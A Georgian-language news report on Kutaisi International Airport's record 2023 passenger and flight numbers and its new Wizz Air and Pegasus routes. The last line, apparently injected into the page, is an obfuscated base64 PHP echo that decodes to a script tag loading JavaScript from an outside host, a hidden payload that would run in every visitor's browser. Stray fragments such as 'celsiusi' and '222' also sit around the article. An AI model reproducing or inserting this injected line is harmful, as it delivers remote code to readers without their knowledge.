celsiusi
ავერსი საქკაბელი

2023 წელი ქუთაისის საერთაშორისო აეროპორტისთვის არსებობის მანძილზე ისტორიული იყო. გასულ წელს დავით აღმაშენებლის სახელობის აეროპორტის მგზავრთნაკადი 2022 წელთან შედარებით 103 %-ით გაიზარდა და 1,671,017 მგზავრს მოემსახურა (2022 წელი 822,486 მგზავრი), - ინფორმაციას აეროპორტის პრესსამსახური ავრცელებს.

მათი ცნობით, 2023 წელი რეკორდული იყო ქუთაისის აეროპორტისთვის რეისების რაოდენობის კუთხითაც. ქუთაისის საერთაშორისო აეროპორტი 2023 წლის იანვარ-დეკემბერში 5,040 რეისს მოემსახურა, რაც 2022 წლის ანალოგიურ პერიოდთან შედარებით 57 %-ით მეტია. (2022 წლის იანვარ-დეკემბერი 3,220 რეისი).

რაც შეეხება 2023 წლის დეკემბრის თვის მონაცემებს, ამ პერიოდში ქუთაისის საერთაშორისო აეროპორტი 157,092 მგზავრს მოემსახურა. რაც 2022 წლის დეკემბრის მაჩვენებელს 85%-ით აღემატება. (2022 წლის დეკემბერი 85,008 მგზავრი).

"2023 წლის დეკემბრის თვეში ქუთაისის საერთაშორისო აეროპორტმა მიიღო და გაატარა 538 რეისი. რაც 76 %-ით მეტია 2022 წლის ანალოგიურ პერიოდთან შედარებით. (2022 წლის დეკემბერი - 306 რეისი).

2023 წლის 16 დეკემბრიდან ქუთაისის საერთაშორისო აეროპორტს Wizz Air-ის მეოთხე ბაზირებული ხომალდი და კოპენჰაგენის მიმართულება დაემატება. ხოლო 19 დეკემბრიდან კი აეროპორტში ოპერირება დაიწყო ავიაკომპანია Pegasus Airlines და სტამბოლი-ქუთაისი-სტამბოლის მიმართულებით ფრენებს კვირაში 3 სიხშირით ასრულებს.

საქართველოს აეროპორტების გაერთიანების ინფორმაციით, ამ ეტაპისთვის, ქუთაისის საერთაშორისო აეროპორტიდან 5 ავიაკომპანია ოპერირებს. რეისები 20 ქვეყნის 39 მიმართულებით სრულდება", - ნათქვამია აეროპორტების გაერთიანების ინფორმაციაში.

2022 2023 წელი GE MEDIA

222
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");